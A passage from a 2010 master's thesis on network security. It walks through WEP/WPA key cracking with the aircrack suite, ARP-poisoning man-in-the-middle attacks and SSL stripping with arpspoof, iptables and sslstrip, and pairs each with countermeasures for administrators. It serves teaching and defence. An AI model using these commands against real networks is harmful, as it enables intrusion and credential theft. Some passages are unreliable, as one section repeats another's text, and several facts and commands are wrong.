Master’s Thesis in Network Engineering

i

Technical report, IDE 1004, February 2010

Network Security Analysis

Master’s Thesis in Network Engineering

Aamir Hassan and Fida Muhammad

School of Information Science, Computer and Electrical

Engineering

Halmstad University

Network security analysis

ii


iii


iv

Preface

First of all we would like to present our hearty gratitude to ALLAH ALMIGHTY, who

always blesses us and makes our path easy during the journey of our lives. We are also

very thankful to Professor Tony Larson, who patiently helped us to complete this work

smoothly. Indeed, his efforts and talent makes it really easy to overcome the hurdles

without any problem. Thank you for guiding us.

Also thanks to our parents and their prayers, who always take our work into their

consideration and remembered us during their supplication.

Finally, we would to thank everyone for their nice support and feedback.

Aamir Hassan

Fida Muhammad

Halmstad University 2010


v


vi

Abstract

Security is the second step after that a successful network has been deployed. There are

many types of attacks that could potentially harm the network and an administrator

should carefully document and plan the weak areas, where the network could be

compromised. Attackers use special tools and techniques to find out all the possible ways

of defeating the network security.

This thesis addresses all the possible tools and techniques that attackers use to

compromise the network. The purpose for exploring these tools will help an administrator

to find the security holes before an attacker can. All of these tools in this thesis are only

for the forensic purpose. Securing routers and switches in the best possible way is another

goal. We in this part try to identify important ways of securing these devices, along with

their limitations, and then determine the best possible way. The solution will be checked

with network vulnerable tools to get the results. It is important to note that most of the

attention in network security is given to the router, but far less attention is given to

securing a switch. This thesis will also address some more ways of securing a switch, if

there is no router in the network.


vii


viii

Contents

1 INTRODUCTION............................................................................................................................... 1

1.1 PROBLEM ADDRESSED IN THIS THESIS ............................................................................................... 1

1.2 GOAL OF THE THESIS ......................................................................................................................... 2

1.3 STRUCTURE OF THIS THESIS .............................................................................................................. 2

2 RELATED WORK ............................................................................................................................. 4

2.1 NEXT GENERATION INTRUSION DETECTION SYSTEM ........................................................................ 4

2.2 SECURITY IMPLICATION OF IPV6 ....................................................................................................... 4

2.3 NETWORK SECURITY BASED ON SYSTEM DYNAMICS ......................................................................... 4

2.4 APPLICATION OF GREY RELATION IN ANALYZING NETWORK SECURITY EVENTS ................................ 4

2.5 EVALUATION OF SECURITY RISKS ASSOCIATED WITH NETWORKED INFORMATION SYSTEMS F .......... 4

2.6 A LAYERED APPROACH TO COMPUTER NETWORK SECURITY ............................................................. 5

3 CATEGORIES OF INTRUDERS AND ATTACKERS .................................................................. 6

3.1 TYPES OF ATTACKER ........................................................................................................................ 6

3.1.1 White hat hacker ..................................................................................................................... 6 3.1.2 Black hat hacker ..................................................................................................................... 6 3.1.3 Gray hat hacker ...................................................................................................................... 6 3.1.4 Phreaker ................................................................................................................................. 6 3.1.5 Script kiddy ............................................................................................................................. 7 3.1.6 Hactivist .................................................................................................................................. 7 3.1.7 Academic Hacker .................................................................................................................... 7

3.2 CATEGORIES OF ATTACK .................................................................................................................. 7

3.2.1 Passive attack ......................................................................................................................... 7 3.2.2 Active attacks .......................................................................................................................... 7 3.2.3 CLOSE-IN ............................................................................................................................... 7 3.2.4 Distributed attacks .................................................................................................................. 7

3.3 SEVEN STEPS TO HACK A NETWORK .................................................................................................. 8

3.4 PASSIVE RECONNAISSANCE AND ACTIVE ACCESS ATTACKS............................................................... 8

3.4.1 Reconnaissance attack ............................................................................................................ 8 3.4.2 Access Attacks......................................................................................................................... 8

4 SECURITY: ATTACK AND COUNTER ATTACK .....................................................................10

4.1 WIRELESS NETWORKS .....................................................................................................................10

4.1.1 WEP (Wired Equivalent Privacy) ..........................................................................................10 Wi-Fi Protected Access (WPA and WPA2) ................................................................................12

4.2 MAN-IN-THE-MIDDLE .......................................................................................................................13

4.2.1 Man-in-the-middle attack ......................................................................................................13


ix

4.2.2 Man-in-the-middle Counter Attack ........................................................................................14 4.3 MAN-IN-THE-MIDDLE WITH SSL STRIP ............................................................................................14

4.3.1 Man-in-the-middle with SSL Strip Attack ..............................................................................15 4.3.2 Man-in-the-middle with SSL Strip Counter Attack ................................................................16

4.4 SESSION HIJACKING .........................................................................................................................16

4.4.1 Session Hijacking Counter Attack .........................................................................................17 4.5 COPYING IP TELEPHONY CONVERSATION .........................................................................................17

4.5.1 IP telephony conversation – Attack .......................................................................................17 4.5.2 IP telephony conversation – Counter Attack .........................................................................17

4.6 MAC ADDRESS SPOOFING ................................................................................................................17

4.6.1 MAC address spoofing – Attack.............................................................................................18 4.6.2 MAC address spoofing – Counter Attack...............................................................................18

4.7 BY PASSING THE LOGIN PASSWORD ................................................................................................18

4.7.1 Bypassing the login password – Attack .................................................................................19 4.7.2 By passing the login password – Counter Attack ..................................................................19

4.8 PORT REDIRECTION ..........................................................................................................................19

4.8.1 Port redirection – Attack .......................................................................................................19 4.8.2 Port redirection – Counter Attack .........................................................................................20

4.9 DENIAL OF SERVICE (DOS) ..............................................................................................................20

4.9.1 Denial of Service (DoS) – Attack ...........................................................................................20 4.9.2 Denial of Service (DoS) – Counter Attack .............................................................................20

4.10 LAYER 1 SECURITY ISSUES ..............................................................................................................21


4.11.1 CAM Overflow ..................................................................................................................21 4.11.2 Root Guard .......................................................................................................................22 4.11.3 BPDU Guard ....................................................................................................................22 4.11.4 Trunk Auto-negotiation .....................................................................................................22 4.11.5 VLAN Hopping ..................................................................................................................22 4.11.6 Wireless Bridge .................................................................................................................23 4.11.7 DHCP Spoofing ................................................................................................................23


4.12.1 TCP SYN Flooding ............................................................................................................24 4.12.2 Ping of Death Attack .........................................................................................................24 4.12.3 Packet Sniffing ..................................................................................................................25 4.12.4 RIP Attack .........................................................................................................................25 4.12.5 IP Spoofing .......................................................................................................................25 4.12.6 Brute Force Attack ............................................................................................................25

5 CASE STUDY 1: IMPLEMENTING LAYER 2 SECURITY .......................................................26

5.1 PLANNING THE NETWORK ................................................................................................................27

5.2 CISCO IBNS (IDENTITY BASED NETWORK SERVICE) / NAC (NETWORK ADMISSION CONTROL) /

802.1X .......................................................................................................................................................27

5.3 IMPLEMENTING 802.1X ....................................................................................................................30


x

5.4 RESULTS OF IMPLEMENTING 802.1X ................................................................................................30

5.5 SECURING DATA THROUGH VPN ......................................................................................................31

6 CASE STUDY 2: IMPLEMENTING LAYER 3 SECURITY .......................................................32

6.1 CISCO STRATEGY FOR NETWORK DEFENCE ......................................................................................32

6.2 IMPLEMENTING LAYER 3 SECURITY .................................................................................................33

6.3 BUILDING SITE TO SITE VIRTUAL PRIVATE NETWORK (VPN) .........................................................33

6.4 IMPLEMENTING CLASSICAL FIREWALLS / CBACS ...........................................................................35

6.4.1 Results....................................................................................................................................35 6.5 IMPLEMENTING NETWORK BASED ACCESS RECOGNITION (NBAR) ................................................36

6.5.1 Results....................................................................................................................................36 6.6 IMPLEMENTING CISCO EASY VPN SERVER ......................................................................................38

6.7 CONCLUSION....................................................................................................................................39

7 CONCLUSION AND FUTURE WORK .........................................................................................40

8 ABBREVIATIONS ............................................................................................................................42

9 REFERENCES ...................................................................................................................................44

10 APPENDIX .........................................................................................................................................48


xi


xii

List of Figures

Figure 2 CAM Overflow ...............................................................................................................................21 Figure 3 : Wireless Bridge ...........................................................................................................................23 Figure 4: Root Guard / BPDU Guard / DHCP Snooping ...........................................................................24 Figure 5: Case Study related to Layer 2 securities ......................................................................................26 Figure 6: 802.1x authentication process .....................................................................................................29 Figure 1: Cisco Defense in Depth (DID) ......................................................................................................32 Figure 7: Layer 3 security scenario .............................................................................................................33 Figure 8: Sniffing data across the network using wireshark without security ...........................................34 Figure 9 Sniffing data across the network using wireshark with security. ....................................................35 Figure 10 Results from CBAC configuration ................................................................................................36 Figure 11: Tunnel p2p traffic through port 80 before NBAR ........................................................................37 Figure 12: Tunnel p2p traffic through port 80 after NBAR. ..........................................................................37 Figure 13: Username and password challenge for EASY VPN client ...........................................................39


xiii


1

1 Introduction Establishing and testing the security is the next step after building a network. Securing a network

implies protecting it from unwanted attacks that could potentially bring down the whole network.

There are a number of ways that an intruder could employ from inside of the network or from

outside the network. Applying the skills and knowledge that an intruder has can enable him to

infect the computers with data or programs, causing an immediate network outage or can enable

him to steal sensitive data like bank transactions etc.

How an intruder is successful in attacking a network? The answer lies in either no network

security, or poor performance of the network security methods deployed. An intruder and a

network administrator positions and reasons quite the opposite to each other. The task of an

intruder is to find his way into the network and carry out some malicious activity, whereas the

task of the network administrator is to protect the network from such incidents. An administrator

sometimes lags behind in this area because an administrator has only learnt about the ways to

stopping such attacks, but never learnt about how these attacks are performed. A good network

administrator must think from the hacker‟s perspective, i.e. break into his own network and, at the

same time, find ways mitigating them.

The terms „hacker‟ and „attacker‟ are used interchangeably. The more sophisticated term used for

these attackers are „hackers‟ and there are categories of hackers who perform their attack for a

specific purpose. United States FBI/CSI now refers these attackers as criminal because they are

involved in, small to big, attacks and can cause trust exploitation, information stealing or helping

other source by some illegal mean which other criminals do without computer. According to CSI

surveys, the following facts were obtained.

According to CSI “200 Computer Crime and Security Survey”, in 2000, a total loss of $266

billion was reported. These losses also included the stealing of proprietary information and

financial fraud [23].

In 2003, a popular network attack DoS was introduced, which was then enhanced to a DDoS

attack. Due to the DoS and DDoS attack in 2003, a total of $201,797,340 of financial loss was

reported [28].

In 2007, virus attacks were radically increasing and constituted the second most dangerous attack

after financial fraud.

The most successful and powerful attack is performed from inside the network. In many

situations, a network administrator trusts all his internal users and never suspects any attack from

their side. However, thinking from the other side, no one can be totally trusted.

1.1 Problem addressed in this thesis

It is always an investment to develop and maintaining a policy for securing the network.

Depending on how the network has been built, an administrator has to monitor and check what

areas could be infected. It could take some time to find loopholes in the network that may lead to

it being compromised. However once found, a policy can be made and the network security

implemented. On the contrary to secure a network, it is easy to just build a network and leave it

unsecure. At the beginning, it is thus easy but when the network already has been compromised

by internal or external threats, then the network administrator instead gets a very high work


2

overhead as compared to if choosing to deploying security up front. Before an administrator takes

something into consideration, it is important for him to know the threat and their severity levels.

This thesis will focus on giving an analysis of security threats and then suggests their mitigation.

1.2 Goal of the thesis

The main goal of network security is confidentiality, integrity and availability. To properly

suggest and implement solutions required for achieving a good running network, the work in this

thesis has been divided into two parts.

Exploring the tools and techniques that exploit the network security.

Debating on different ways of securing Layer2 and Layer3 devices, and finding the best

possible solution by using the network vulnerable tools to explore the extent of network

security.

1.3 Structure of this thesis

The work in this thesis is presented as follows. In chapter 2, related work in the field of network

security will be discussed. In chapter 3, common categories of attacker, and the way these attacks

are performed, will be discussed. Chapter 4 is dedicated to the methods and tools that are

vulnerable and can be used to attack a network. In chapters 5 and 6, separate case studies on

Layer 2 and Layer 3 will be conducted. Finally, the thesis will reach an end with its

comprehensive conclusion and corresponding proposals of future work.


3


4

2 Related Work

2.1 Next Generation Intrusion Detection System

The McAfee network protection solution [59] promotes the next generation intrusion detection

system (IDS). At the time when it was developed, there was a vital need to provide some real

time network protection that could detect and report unwanted traffic immediately without the

major concern of an administrator. Though they did address the major sections of the problem but

with the time they seem insufficient keeping in mind the pace with which networks are changing.

With IDS, the approach is to detect any security flaw rather than preventing it. Hence, the

network always faced the threat of a possible attack. They wanted to improve an IDS approach

towards the more advanced one, which has the ability to not only detect threats, but also to stop

them.

2.2 Security implication of IPv6

With the development of IPv6 many weaknesses and problems that IPv4 had are addressed [4].

IPv4 explicitly uses ESP or AH protocol to encrypt the data but now, with the enormously large

address field of IPv6, the security mechanism is built into the header of IPv6. In the explanation

of IPv6 security features, the author states that an intruder will face difficulty that an intruder will

face difficulty during the backdoor, or sniffing, attack with IPV6

2.3 Network security based on system dynamics

Four Chinese students performed a simulation based on the behaviour of worm attacks based on

system dynamics [3]. The worms produced an arbitrary code inside the memory and, with the

passage of time, it started to corrupt the local file system. In this project, these students simulated

a worm attack on the basis of its system dynamics, and they also described the worm features.

The approach of this project was to extend the network security from malicious software.

2.4 Application of grey relation in analyzing network security events

Network attacks can also be engineered on the basis of events. In this project, the author [29]

sorted and labelled attacks on the basis of severity level and then generated reports on the basis of

different severity levels. The author‟s approach was to design a system that could guide security

management, prevent the threats, block and reduce risks. The author performed a series of case

studies predominantly to analyze network security.

2.5 Evaluation of security risks associated with networked information systems f

The authors in this thesis performed a risk analysis associated with growing internet usage inside

a company [36]. A literature review and a case study were conducted on B2B application

implemented in a large Japanese electronics firm based in Australia. The authors gathered

security threat information that seamlessly hits the host or network infrastructure due to the

network administrator‟s update latest software patches. In the final part, the project concluded

with the security evaluation framework that will help to get acceptable results in real applications

without too much concern from a security expert.


5

2.6 A layered approach to computer network security

The project work was solely dedicated to addressing the problem found at different layer of OSI

reference model [48]. The authors detailed the security aspects and threat related to link layer,

and touched the surface of network and transport layer. The authors searched the insider details

that rises from the internet usage and also addressed the problems found in internet protocol

stack.


6

3 Categories of Intruders and Attackers This section will briefly discuss different types of network attacks and intruders. Before getting

into the details of attack types, it is important to know about the person behind the scene.

3.1 Types of Attacker

These are people who want to get into the system and compromise its security. They range from

those who have little experience to those who are highly skilled. Here, experience refers to their

technical abilities in the field of computers and network systems. Little or no knowledge refers to

those who can, by the use of some tools; break into the system without requiring a high level of

technical knowledge. This section will classify them in groups, based on their knowledge and

their purpose, reason or motivation for making an attack to the network.

3.1.1 White hat hacker

White hat hackers generally termed as “ethical hackers”. They are the better half of this dark

world of hacking [2]. They represent those who have the knowledge and technical ability to

easily break into the system, but they never exercise this. On the contrary, they use this

knowledge for the good and fill in jobs like network security engineers or administrators. White

hat hackers are amongst the most highly paid individuals in the US [14]. They reflect the fact that

the use of the internet is constantly increasing and so are the security threats. The EC-Council

now offers a CEH (Certified Ethical Hackers) [30] course, where they train people on how to

mitigate attacks like hacking.

3.1.2 Black hat hacker

Black hat hackers, as the name implies, is the evil side of hacking, and their main objective is to

take over the network by hook or crook, and destroy or sabotage the network resources [39] .

Black hat hackers hold conferences on how to improve their hacking capabilities. These people

are very experienced and know almost all the ways of how to break into the network. There is no

particular purpose of the black hat hackers as to why they want to hack, but their intentions may

include revenge, or stealing money, or maybe just to check how far they have improved in this

field. Black hat hackers possesses the same knowledge as that of white hat hackers with the only

difference that white hat hackers work towards securing the network unlike their black hat

counterparts.

3.1.3 Gray hat hacker

Gray hat hackers can be thought of as white hat hackers who occasionally stray away from their

goal of protecting the network and, instead, act unethically. Grey hat hackers are not permanently

employed at companies; rather, they are called in for security audits. Given opportunities, the

gray hat hackers might, for their own personal gain, hack into the system and steal desired data.

3.1.4 Phreaker

Phreakers [50] can be thought of as hackers in the world of telecommunication rather than IP

networks. These are people who can trick the telecom system to make distance calls for free. The

numbers of Phreakers is on a decline, but still some strategy is needed to cater for this problem.


7

3.1.5 Script kiddy

Script kiddies [60] are not true hackers, and have almost no knowledge of hacking, but could

download killer applications and use them with little research to attack the network. E.g. Nessus

[61] is a free security auditing tool. These script kiddies will download this tool to perform an

audit to, for example find out that someone is running IIS [40] web server on port 80, this

because IIS is prone to security weaknesses. By using such tools, they could find out the security

holes to attack the IIS network.

3.1.6 Hactivist

Hactivists [7] are those who are driven by political motivation to hack into any network. Often, it

is terrorists or foreign agencies who hack into other countries‟ sites to steal sensitive information

only to gain their political motives.

3.1.7 Academic Hacker

Academic hackers [15] hack for their academic careers. They are kids who want to break into the

university firewalls to change their grades or steal a paper to get good scores in exams.

3.2 Categories of Attack

This section will discuss how a hacker can perform an attack on a network [52].

3.2.1 Passive attack

Passive attacks also know as reconnaissance attack is the first step the hacker takes in order to

perform hacking. During this phase, the hacker tries to gather information with the aid of packet

sniffing, scanning active ports or performing ping scans to see what IP addresses are active

around the networks. This is the initial phase of hacking and usually it is very difficult to detect

any such activity.

3.2.2 Active attacks

After a passive attack, an intruder has enough information about active ports, IP addresses around

the network and also have queried enough to launch an active (access) attack. In this phase, the

attacker usually performs “Man in the Middle” attack. Man in the Middle attack is one of the

most dangerous attacks and resides in the midway communication between the gateway and the

client. It is transparent in nature, hence eliminating the possibility of it being detected while it

sniffs sensitive data. Trust exploitation and password attacks also fall in this category.

3.2.3 CLOSE-IN

These are people who are connected to the inside of the network. Most of the time, the network

administrator is much concerned about securing his network from the outside while neglecting

any possibility of attack from inside his own network. A “close-in” attack means that intruders

are close to the network where they have direct connected links to the network.

3.2.4 Distributed attacks

These are people connected and thus with access to the inside of the network. Most of the time,

the network administrator is much concerned about securing his network from the outside while


8

neglecting any possibility of attack from inside his own network. A “close-in” attack means that

intruders are close to the network where they have direct connected links to the network.

3.3 Seven Steps to hack a network

If we think like a hacker, there are seven steps to hack into a system. The order does not matter in

this process. The following is a brief description of how the whole process is carried out.

Perform reconnaissance

Identify active applications and type and version of operating system

Gain system to the network

Log in with user credentials, escalate privileges

Create and gather other usernames and passwords

Create backdoor

Use system

3.4 Passive reconnaissance and active access attacks

This section will discuss, in details about two well known methods reconnaissance and access

attacks. These two attacks fall one after the other.

3.4.1 Reconnaissance attack

Passive (reconnaissance) attack [41] is mostly the first step. In this step an attacker starts to gather

information about the network. First, an attacker performs ping sweep and then a port scan. It will

give the intruder some information about the active ports and hosts that are alive in the network.

Other ways to gather such significant information can be from so called “dumpster diving”,

where the hacker could meticulously study the so-called “garbage”, and arrive with some very

useful information which is of little or no importance to people like us. Furthermore, the intruder

can go all the way and start tapping the wire where the active conversations are going on in the

LAN environment; the same could be done for wireless signal sniffing. All such attacks are

broadly termed as “reconnaissance”.

3.4.2 Access Attacks

Once the intruder has gathered the preliminary information he/she needs, he/she then heads

towards the access attack. The most common among these is the DoS and DDoS attack. During

these, the attacker tries to overwhelm the router, or the switch‟s memory, by sending countless

fake requests, hence exhausting the CAM (Content Addressable Memory) used for

routing/forwaring tables. As a result of this, the router/switch becomes unreachable or exhausted

and starts sending out replies as a broadcast which the hacker intercepts and pulls out the

information he/she needs. We also have a plethora of ICMP attacks. Most of the time they are

mistaken for valid ICMP requests but they end up being spoofed attacks. The most common

ICMP messages include Destination Unreachable, Request Timed Out, Packet too big, Echo

Requests, Echo Reply, ToS and Host Unknown. TCP SYN flood is the most dangerous of these

attacks. In this attack, the intruder will try to establish as many half TCP sessions as possible.

Half session implies that the attacking system would expect a reply from the router/switch for the

3-way handshake to be completed. Thus the router is so plagued by such unfinished work that it

cannot reply each and every TCP session and hence surrenders its resources to the attackers.


9


10

4 Security: Attack and Counter Attack This section explicitly deals with the different types of attacks and how to counter strike them.

For sound network administration, it is good to study how an attacker thinks in order to be able to

find a solution for the problem. This chapter will outline the important tools and the way that they

are used, for example to escalate the privileges. Case studies discussed in this thesis also focus on

wireless networks.

4.1 Wireless Networks

Wireless networks can be protected in many ways. Some important standards related to such

methods are discussed below.

4.1.1 WEP (Wired Equivalent Privacy)

In 1997, WEP [17] (Wired Equivalent Privacy) was introduced as a first technique to secure

wireless networks from an un-authorized access to the network. WEP uses two ways to

authenticate clients.

Open key authentication: the client does not need to provide its credential to the access

point. Anyone can authenticate without a key, and then associate with the access point.

However to encrypt and forward data across a wireless network a client needs the right

WEP key.

Shared key authentication: In this case, is required for authentication and hence requires

four ways challenge to complete.

Client sends an authentication request.

A clear-text challenge is sent by an access point to the client.

Client encrypts the key and challenge together and sends it to the access point.

The data is encrypted by the access point and compares it with the clear-text it sent, and

posts a positive or negative response to the client, based on comparison result.

Comparing open key and shared key authentication, Open key authentication is considered better

then shared key authentication (Note: Both are weak) because anyone can catch the stream of

communication in shared key authentication and can then decrypt the key.

Attacking WEP (Wired Equivalent Privacy)

aircrack [24] is a powerful tool that can be used to launch attacks against WEP and WPA [31]

keys (discussed next). It can also be used under the Windows operating system but, due to limited

support for wireless adapter, it is widely used in Linux.

To explain this demonstration, the Linux distribution called Ubuntu 9.04 [18] was installed as a

standalone system, along with the aircrack utility and the attack was launched against the

WEP open standard. We made sure that aircrack also was installed correctly and then

confirmed that the wireless adapter was shown by issuing the following command.


11

Ifconfig wlan0

If the operating system reports the configuration of wlan0, then the next step is to check whether

the aircrack utility supports the wireless adapter or not. Issue the following command.

airmon-ng

If the utility reports the attached wlan0, its chipset type along with the driver information, then

the next step is to scan for the available networks around; this tool will also report the hidden

networks. Issue the following command at command prompt.

airodump-ng wlan0

Wait for at least 30 seconds so that the utility confirms all the wireless networks and their

associated channels. After 30 seconds, hit ctrl+z to break the current session and issue the

following command to start scanning the target.

airodump –w <filename> --bssid <BSSID> -c <channel> wlan0

-w option specifies where to store possible combinations of keys scanned; BSSID and channel

information is taken from the command issued above. Wait until #Data portion reaches beyond

20,000, and then press ctrl+z to break the current session. Now issue the following command and

wait for at least one minute so that the key is decrypted.

aircrack-ng <filename>-01.cap

So the right key is decrypted and shown on the screen after issuing the command above.

Wired Equivalent Privacy (WEP) Counter Attack

WEP encryption is very weak, as demonstrated above, and is very easy to break, even without

brute force attack, but still it is very popular among SOHO users. The reason for using WEP in

the SOHO environment is that it is faster than WPA, because of encryption and packet overhead.

Another reason is that, with older clients, the driver card of the wireless adapter can not be

updated to support WPA / WPA2 encryption.

To stop all attacks, the quick mitigation is to avoid the use of WEP. However if there is no option

other than WEP, then stop the DHCP server on your access point so that even if the key is

cracked, no one can get an IP address. Assign manual IP address on every client and change the

subnet from commonly used 192.168.1.x/24 subnet to something different, like 23.191.81.x/27 or

131.229.56.x/29 subnet. Many intruders consider that clients will use a private IP addressing

scheme, so an intruder could scan the whole private address space (10,172,192) networks to get

all the clients around. So if the subnet is other than private IP addressing scheme then it can stop

them from scanning the network for the available clients. However, this gives quite a weak

protection for business solutions thus WEP is not recommended.


12

Wi-Fi Protected Access (WPA and WPA2)

WPA and WPA2 Wi-Fi protection is same. In order to address the weakness found in WEP,

WPA came as a replacement for WEP. IEEE 802.11i [19] was an amendment to 802.11

standards, which stated the mechanism for protecting wireless networks. WPA uses two flavours

of authenticating clients.

WPA Enterprise (RADIUS Server [35] is required)

WPA Personal (TKIP or AES)

WPA Enterprise is a solution for medium to large business by using 80.21 x [25] technologies to

authenticate users based on certificates. In this way, a client with a proper certificate installed in

their system can access the network.

WPA Personal is aimed for SOHO (Small Offices Home Offices) users, and uses the same

method of pre-shared key authentication as WEP. It gives stronger authentication than WEP, and

utilizes TKIP (Temporal Key Integration Protocol) or AES (Advance Encryption Standard) based

system for encryption. WPA is based on the same technique used in WEP four way handshakes.

But WEP uses clear key data passing, whereas WPA encrypts these packets. WPA TKIP and

AES encrypts the packet with client communication, but the problem with WPA TKIP is that it

uses static packet challenges and, using another tool called cowputty [10], the passwords could

be easily cracked by using brute force attack. WPA AES uses different packets to send the

challenge, so does that mean WPA AES is more secure? The answer is no. WPA AES uses a little

bit more overhead to mark more encryption so, in this way, cowputty could not be used to

achieve this task. Use aircrack instead.

Attacking WPA/WPA2 (Wi-Fi Protected Access)

The process of cracking WPA TKIP/AES is similar to that demonstrated in WEP but, as WPA

uses four way handshake challenges to verify the client, so here aircrack utility uses forge

packets to send fake identity to the access point so that it verifies itself. Without using this fake

identity hand shake, the data could not be received for brute force attack. Start the same steps as

explained in WEP. During the collection of data from access point, use another terminal and type

the following command to complete fake four way handshake.

aireplay -0 1 –a <your-wlan-mac> -c <BSSID> wlan0

This command will de-authenticate the client and complete the four way hand shake. Go back to

the first terminal and check the upper right corner, where WPA handshake <your mac> option

appears. Now break the terminal by using ctrl+z and launch the brute force attack. There are

dictionary files available with possible passwords to sniff the password. Remember that the size

of those dictionaries is more than 30 GB and the chances are higher that it may include the

common combinations of password. The dictionaries can be downloaded from [5].

For this demonstration, the password to protect the access point is <-pMxlionz c0nu3cti05ns->.

Now type the following command to search the password.


13

aircrack-ng –w <dictionary file> -b <BSSID> <file-name>-01.cap.

¨

Wait for a minute and surprisingly the complex password was cracked.

Wi-Fi Protected Appliance (WPA / WPA2) Counter Attack

WPA/WPA2 is a better method than WEP. As demonstrated above, WPA TKIP/AES is still

vulnerable to attacks and, with a brute force attack, the password could easily be retrieved. For

SOHO users, the WPA option does not include the WPA Enterprise option due to its cost factors.

WPA enabled appliances mandate 8 – 63 characters combination for password protection. The

mitigation is that if possible then use all the 63 combinations, or at least 25 characters or above,

and use a password which is hard to guess and includes not only letters but also special

characters, numeric etc. The brute force dictionaries are expanding day-by-day and, if the

password is not in the dictionary, it might be available the day, another so often change your

password and never stick to one for long time.

Enterprise users should migrate to the RADIUS option and implement 802.1x, commonly known

as “EAPOL” (Enhanced Authentication Protocol over LAN – a method to use EAP over local

area network).

4.2 Man-in-the-middle

A man-in-the-middle attack, as the name suggests, is an intruder whose role is to intercept the

data flowing between the client and the gateway transparently. In this way, an intruder

camouflages a client by pretending that he/she is the default gateway and representing default

gateway that he/she is the client. A man-in-the-middle attack is a very powerful attack and it can

give an intruder a full choice of controlling the PC, and ongoing communication can benefit an

intruder to steal the usernames/passwords or even credit cards information.

4.2.1 Man-in-the-middle attack

In order to launch a man-in-the-middle attack, a combination of tools can be used to benefit from

this attack. Note that these tools can only work on wired networks: it does not work for wireless

networks. However an intruder can still make it happen even on wireless networks, with the help

of a tool called VMWare [32]. An intruder can install virtual operating system in VMWare, and

can then bridge it with a physical wireless network on real operating system to sniff everything

from the wireless network. The demonstration below for the man-in-the-middle attack is for both

wired and wireless networks. To perform it on wireless networks, use VMWare.

First of all, perform an ARP request to check out who is around by using the following command

on Linux or Windows using command prompt or terminal window.

arp –a

A list of clients attached to the current subnet will be listed. Pick any client in the list and use

nmap [33]. nmap is a tool used in Linux and Windows to scan the active ports on the target. In

this case, a client picked from ARP request will be scanned for active services. While namp is

running in background, use Cain & Abel [20] in Windows or ettercap [21] in Linux to

perform a man-in-the-middle attack.


14

Open the tool; scan the whole subnet for available victims. Choose the default gateway and any

victim to start poisoning. After poisoning is successful, all the victim data will be passed through

the intruder‟s PC.

Now it is time to sniff the data. There are a lot of tools available for sniffing. The most popular

used one is Wireshark [26]. The problem is that this tool could only be used to sniff wired

network clients, so for wireless networks, use the same VMWare option with bridge connection.

4.2.2 Man-in-the-middle Counter Attack

It is not possible to completely out rule man-in-the-middle attacks. On LAN, or wireless

networks, it can even be a client who launches such an attack. The best way is to use encryption.

Using encryption for our data has, off course, its downside in the form of performance

degradation but, on the plus side, the attacker is unable to comprehend what he/she has hacked.

For SOHO, the fact that the user is using wireless access point without 802.1x technology does

not guarantee protection. In former times, access points were sold separately for SOHO and

enterprise users, but now they are sold with 802.1x enabled.

Enabling 802.1x on wireless and wired network is different. For wireless networks, there is built

in 802.1x software installed with firmware so it can be enabled easily. With wired networks using

switches, it requires a specialized server, known as NAC (Network Admission Control) server

[9]. Network Admission Control will be discussed in detail with its configuration in the next

chapter.

For an enterprise network with a LAN passing residential gateway through the router, use EASY

VPN [27] server. EASY VPN server offers authentication, integrity, confidentiality and anti-

replay mechanism for the packets. All the packets are hashed using complex mathematical

algorithms using md5 or SHA. EASY VPN server will be discussed and configured in chapter 6.

4.3 Man-in-the-middle with SSL Strip

Just visit a secure website like www.paypal.com and notice the “s” along the http in the browser

address bar. The “s” after http indicates the site‟s security and trustworthiness. It stands for secure

http or http setup via secure socket layer (SSL). SSL uses an asymmetric cryptographic technique

to pass the confidential data securely between a server and client using a public private keys

combination. In this way, a server keeps one private key and every client connecting to that

server is given a different public key. When a client enters their confidential data, like username

and password, the public key will encrypt his data using a 1024 or 512 bit encryption mechanism,

and this data can only be decrypted by the private key, which the server owns. No one can

decrypt this data or reverse engineer the public key to get the private key.

When„s‟ is appended with http, the data is encrypted by asymmetric key encryption. Man-in-the-

middle attack can be launched from here onwards. Any intruder performing a man-in-the-middle

attack can strip off that „s‟ before the server is reached. In this way, all of the data sent by client

will be forwarded to the intruder using http and the intruder will forward the data to the server

using https. Thus, both server and clients are escalated and the client‟s credentials will be

retrieved in clear text.

http://www.paypal.com/


15

4.3.1 Man-in-the-middle with SSL Strip Attack

The illustration in this section is performed on Linux. The procedure is different than that

followed in section [4.2]. Linux commands will be used to perform arp poisoning. First of all, use

nmap to scan the active hosts around the network.

nmap –sC -0 192.168.1.0/24

This command will filter whole subnet for active hosts. Now check the status of IP tables.

cat /proc/sys/net/ipv4/ip_forward

The output from this command will return 0. IP forwarding simply means to follow traffic from

one interface to another interface. In this case, the Ethernet or wireless interface will act as both

receiving and acting interface. If the value is zero, no forwarding will take place; therefore,

change it to value 1 by issuing the following command.

echo “1” /proc/sys/net/ipv4/ip_forward

Issue the first command again to confirm that the value is 1.

Now, a little bit of game with IP tables. IP tables are like access lists in Linux world. Going back

to CCNA world, certain traffic is denied, allowed or redirected, using access lists. In this case, IP

tables are used to redirect the web traffic from the client on the standard port the local host i.e. the

intruder‟s computer. Issue the following command to redirect web traffic to the intruder‟s

computer.

iptables –t nat –A PREROUTING –p tcp --destination-port 80 –j REDIRECT --to-port 8080

Now the machine is ready for IP FORWARDING and PORT REDIRECTION. After the above

procedures have been done correctly, launch a man-in-the-middle attack.

arpspoof –i eth0 –t <client-ip> <ip-address-of-gateway> For Wired networks or arpspoof –i

wlan0 <client-ip> <ip-address-of-gateway> For Wireless networks

The tool SSLSTRIP is programmed in python. Just install this script and run it in another

terminal while the arp spoofing is on its way.

./sslstrip.py –l 8080 Listen to traffic that was forwarded to local host.

Just go to www.paypal.com on the victim‟s PC and check that the browser window is showing

http not https. To confirm it, just check a normal PC without man-in-the-middle attack, it will be

discovered that the site has greeted with https. The reason why the victim‟s computer is not

showing https, because an intruder is performing a man-in-the-middle attack and acting as default

gateway for the victim, thus it is striping off the client‟s https request, just leaving normal http

request, which is clear text. However, the server requires https, so the intruder is doing that job on

behalf of a client and following the client‟s request through its computer to the server.

http://www.paypal.com/


16

4.3.2 Man-in-the-middle with SSL Strip Counter Attack

As discussed in man-in-the-middle attack, use encryption. The encrypted packets can never be

stripped by the intruder. Use VPN [16] or Easy VPN for layer 3 defence. It is recommended not

to use wireless internet outside a popular WIFI spot.

4.4 Session Hijacking

When a client connects to the internet and browses a website or checks email, the client

application service (web browser or email) assigns a temporary number to the client PC which is

stored at the server. This session is associated with the client application service as long as the

page is active; after the page is closed the number is washed out. Similarly, an email service

offers the same job when a client moves back and forth inside the email box. Some services offer

to store this session information to the client PC for future retrieval; this is mostly used in email

system where a client does not wish to enter the email ID and password again and again. The

permanent storage of sessions at a client PC is known as “cookies”.
